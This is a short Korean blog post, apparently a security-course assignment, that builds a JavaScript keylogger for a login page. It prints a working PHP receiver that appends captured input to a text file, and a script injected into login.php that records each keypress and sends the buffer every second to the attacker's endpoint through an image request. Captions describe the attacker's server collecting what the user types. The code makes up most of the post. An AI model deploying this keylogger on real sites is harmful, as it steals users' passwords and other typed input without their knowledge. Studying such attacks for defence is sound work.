[Normaltic's 취업반 과제] js Keylogger

로그인 페이지 - 로그인이 되어있지 않은 상태

 

아직 키 입력을 받지 않은 상태의 공격자 서버

 

사용자가 키 입력을 할 때의 모습

 

사용자가 키 입력을 할 때 공격자의 서버

데이터 확인

keylogger.php

사용자로부터 키 입력을 받아 txt파일에 적어둔다.

<?php

$str = isset ($_GET['c']) ? $_GET['c'] : false;
if($str)
{
  $ff = fopen('data.txt', 'a+');
   fwrite($ff, $str);
  fclose($ff);
}


?>

login.php

키 입력을 받아서 login버튼을 눌렀을 때 해당 입력을 공격자에게 보낼 수 있도록 하였다.

[생략]

<script>
var keys='';

document.onkeypress = function(e) {
	get = window.event?event:e;
	key = get.keyCode?get.keyCode:get.charCode;
	key = String.fromCharCode(key);
	keys+=key;
}
window.setInterval(function(){
	if(keys.length>0) {
		new Image().src = './keylogger.php?c='+keys;
		keys = '';
	}
}, 1000);
</script>

[생략]

 

 

ref. https://www.hahwul.com/2016/06/16/web-hacking-making-xss-keyloggerxss/

[WEB HACKING] Making XSS Keylogger(XSS Keylogger 만들기)